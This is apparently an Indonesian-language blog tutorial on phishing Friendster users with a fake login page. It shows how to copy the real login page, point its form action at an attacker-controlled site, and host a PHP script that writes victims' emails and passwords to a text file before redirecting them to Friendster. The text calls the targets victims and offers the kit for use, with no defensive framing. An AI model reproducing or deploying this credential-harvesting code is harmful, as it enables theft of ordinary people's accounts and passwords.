Friendster Hack ( fake login )
Petama-tama tentu kita harus mengetahui scrit seperti apa sih yang Friendster gunakan untuk login page-nya ? Dalam kasus ini kita akan coba melihat pada bagian login ulang (kalau salah memasukkan username atau password), sehingga akan terlihat seperti ada sebuah error dari pihak Friendster, apabila seorang korban terkena Script redirect ini. Biasanya apabila ada error pada login pertama, Friendster akan memberikan kita sebuah page yang terdapat pada http://www.friendster.com/login.php dengan sedikit informasi tambahan bahwa kita salah memasukkan username atau password, maupun berbagai error sejenis lainnya.
Oleh karena itu, mari kita buka http://www.friendster.com/login.php dengan menggunakan Browser kesayangan masing-masing, kemudian menampilkan Source Code halaman tersebut. Bagi mereka yang belum mengerti bagaimana melakukan itu dengan menggunakan Firefox, kalian hanya perlu klik kanan pada halaman kosong dan pilih View Page Source. Yang kemudian secara otomatis, akan membuka sebuah halaman baru yang berisikan source code HTML daripada halaman Friendster tersebut. Berkut adalah source code tersebut :
----------------------------------------------------------
<div class="login">Please sign in to continue</div>
<div class="boxcontent"><form name="login_form" method="post"
action="/login.php">
<input type="hidden" name="_submitted" value="1"><input type="hidden"
name="next" value="/"><input type="hidden" name="tzoffset" value=""><script
language="JavaScript">
dan seterusnya….>>>>>-----------------------------
1. Yang harus kita lakukan pertama-tama adalah meng-copy Script tersebut ke dalam Notepad dan melihat secara khusus bagian terpenting yang aku beri warna merah di antara sekian banyak Script asli halaman tersebut.
Yang harus kita lakukan pada bagian ini adalah mengubah action=”/login.php” menjadi action=”http://www.xxxxxx.com/login.php yang mana www.xxxxx.com adalah Website tempat kita menyimpan file login.php, friendster.txt dan halaman palsu kita nantinya. Setelah Script halaman palsu tersebut telah siap, kita hanya perlu melakukan Save As HTML. Misalkan friendsterpalsu.html.
2. Tanamkan PHP Script untuk logger-nya ! Betuknya kira-kira seperti berikut :
<?php
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen('friendster.txt','a');
fwrite($fl,"$email . $password \n\n");
fclose($fl);
?>
<script LANGUAGE="JavaScript">
window.location="http://www.friendster.com/index.php";
</script>
Copy script tersebut ke dalam notepad, dan Save As dalam format php. Misalkan login.php
Setelah melakukan proses seperti gambar tersebut, kita akan mendapatkan file login.php. tapi apa sih yang script ini lakukan? Dia akan mengirimkan email dan password yang telah dituliskan oleh para korban kita di halaman login palsu. Yang kemudian akan dituliskan pada friendster.txt.
3. Jadi setelah ini apa yang harus kita lakukan? Ya tentu saja membuat file friendster.txt yang kosong kemudian mempersiapkan kedua file tersebut (login.php dan friendster.txt) untuk kemudian digabungkan dengan halaman palsunya.
Sekarang kita telah memiliki tiga file penting, yaitu friendsterpalsu.html, friendster.txt, dan login.php. dan sekarng adalah waktu bagi kita meng-upload tiga file tersebut ke dalam Website kita, sehingga kita akan memiliki tiga buah link yaitu :
http://www.xxxxx.com/ friendsterpalsu.html
http://www.xxxxx.com/friendster.txt
http://www.xxxxx.com/login.php
link yang menampilkan halaman login paslu yaitu http://www.xxxxx.com/ friendsterpalsu.html